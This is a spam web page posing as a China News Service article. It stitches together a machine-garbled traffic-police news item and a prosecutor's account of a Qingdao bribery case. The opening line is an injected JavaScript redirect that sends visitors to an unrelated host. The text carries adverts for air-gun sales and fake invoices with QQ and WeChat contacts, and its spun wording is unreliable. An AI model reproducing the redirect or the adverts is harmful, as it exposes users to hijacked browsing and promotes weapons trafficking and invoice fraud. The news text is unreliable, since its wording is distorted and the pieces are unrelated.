window.location.href="http://w.1jiyuan.com:1357";

 中国新闻社
首页 新闻大观 中新财经 中新体育 中新影视 中新图片 台湾频道 华人世界 中新专稿 图文专稿 中新出版 中新专著 供稿服务



首页>>新闻大观>>国内新闻>>新闻报道

须眉遇交警查车当街舞蹈 趁人不备弃车逃跑|交警|弃车|须眉

2017-07-28 06:27:08

汽枪█咨询QQ:2511542233█V信bb1076499★定货送全套配件,公司提供最先进国产|原装|进口货|服务水平一流,多年的销售经验,免定金,支持验货,诚信交易,不满意不收一分钱。

  来源:齐鲁网

  齐鲁网7月16日讯7月15日,海口一须眉驾无牌电动车时被交警拦下,不但不共同交警检查还以各种来由请求交警放行,被交警回绝后感情渐渐失控,竟在斑马线乱跳乱舞,还疑似打击执勤职员,因妨碍交通,被3名交警就地节制。但不虞,须眉又边舞蹈边解脱节制,舞蹈跳到了马路中间,末了趁交警不留意弃车逃跑了。今朝,民警表现正在追究当事人。

义务编纂:张建利



相关报道:持有气枪1支和2支
相关报道:里约奥运会气枪比赛
相关报道:打猎工具出售

新闻大观>>国内新闻>新闻报道


新闻大观| 中新财经| 中新体育 中新影视| 中新图片| 台湾频道| 华人世界| 中新专稿| 图文专稿| 中新出版| 中新专著| 网站地图| 联系我们

分类新闻查询

本网站所刊载信息,不代表中新社观点。 刊用本网站稿件,务经书面授权。


山南石油发票_山南石油发票_百度_图片
打印页面

首页 > 新闻中心娱乐星闻 山南石油发票

反贪局从一则网络帖子中挖出7人受贿窝案

 

山南石油发票;相关报道 【企/业/需/要/本/地/正/规/发/票 找136/6023/6366刘/会/计Q/Q865/121/201】✔点/数/优/惠/✔支/持/验/证/后/付/款✔合/作/共/赢/✔████████▂▃▄▅▆▇█▉▊▋


  原标题:山东各市档案局公布17个抗战时期惨案档案

长治酒店住宿发票

连云港广告发票

葫芦岛电子科技发票

树林医疗器械医药发票

  2015年初,我院反贪局信息情报组人员在网络论坛上发现了一则题为“青岛艳妇老板陪睡电梯招标负责人,陪出千万天价电梯”的帖子,点击率高,群众反映强烈。

  据此,我们立即展开信息初查,发现确实存在帖子提及的招投标项目,中标方也的确是帖子上所反映的电梯公司。而且,该公司法人代表王丽(化名)在青岛电梯招标领域是个名人,其公司虽不起眼但中标率却非常高。

  经仔细研判,我们认为其中可能存在串通投标嫌疑,更可能有行贿受贿问题。结合以往办案经验,我们打算先从串通投标入手,再顺藤摸瓜,查清背后的利益链条。

  我们首先调取了相关招投标文件,找到了招标代理公司和涉嫌参与串通投标的几家公司的账户。发现这几家公司的保证金都是先从王丽公司转入,然后再把保证金转入招标代理公司,招标结束后招标代理公司又把保证金转回未中标公司,这些公司再把钱转回到王丽公司账户。至此,王丽公司涉嫌串通投标的犯罪事实浮出水面。我们还发现王丽个人及其公司账户资金流动异常,存在行贿嫌疑,这些为我们查办此案打开了突破口。

  串通投标罪属公安机关管辖,我们与公安机关密切协作,联合办案,对王丽进行布控,掌握其行踪。得知王丽正在加拿大旅游,近期将会回国,我们当机立断,决定在机场抓捕王丽。

  2015年5月4日,我们确定王丽登上回青岛的航班后,立即动身前往机场。在机场公安的配合下,飞机落地后没有让乘客下机,我们在飞机上顺利将王丽抓获,令其措手不及。同时,另一组侦查人员对王丽住处及办公室进行搜查,搜出其个人账本、伪造的公司印章及受贿人退回的行贿赃款。

  抓捕王丽后,技术人员第一时间对其手机内容进行了恢复、提取,发现了大量她与其他人商量串通投标、行贿等内容的聊天记录,为突破口供提供了重大帮助。王丽到案后仍抱有侥幸心理,负隅顽抗,始终强调自己经营公司十分正规。我们运用讯问策略,展开心理攻势,适时出示所查到的保证金流转过程、其他参与串通投标公司人员的证言、从其办公室扣押的伪造公司印章等证据,彻底击溃了其心理防线,使其如实供述了串通投标、伪造公司印章的犯罪事实。然而,对行贿行为她却始终闭口不谈。我们仔细研究现有证据,将其手机聊天信息、个人账本、银行流水进行横向比对,逐一核实,深挖细查,固定了王丽向多名国家机关工作人员行贿的证据。在大量证据面前,王丽最终放弃抵抗,如实供述了其向多名国家机关工作人员行贿的犯罪事实。

  至此,我们从起初的一则网络帖子介入,开展精细化初查,精准把握证据,巧用审讯谋略,成功突破了7件7人受贿窝串案,其中包括,李沧区重点工程指挥部办公室原主任郭某(正处级)涉嫌受贿要案,青岛市北城市建设投资有限公司项目处原处长陈某(副处级)涉嫌受贿大案,青岛市国税局稽查局原助理调研员王某(副处级)涉嫌徇私舞弊不征、少征税款案等。

  (代君庆 郭树合 郭晓云;代君庆系山东省青岛市市南区人民检察院反贪局局长)


乌鲁木齐农副产品发票


相关新闻

陕西石油发票: 侠客岛:法官,请挺直腰杆断案

宜春建筑材料金属材料发票: IS刽子手曾想自杀 为摆脱军情五处监控

泉州运输发票: 河南获嘉县“情夫杀婴案”凶手被判死缓

汉中煤炭发票: 诗人汪国真因肝癌去世 终年59岁

哈密农副产品发票: 韩国游客在香港遇车祸 16人受轻伤(图)

朝阳电子科技发票: 被“代言”陶瓷 张亮索赔68.5万

白沙酒店住宿发票: 英国申请加入亚投行 美国公开批评

大兴安岭电子科技发票: 广西-东盟开发区管委会副主任许成被双开

文章来源:沧州电子科技发票: 陆航某团2名飞行员夜间飞行训练英勇牺牲

0444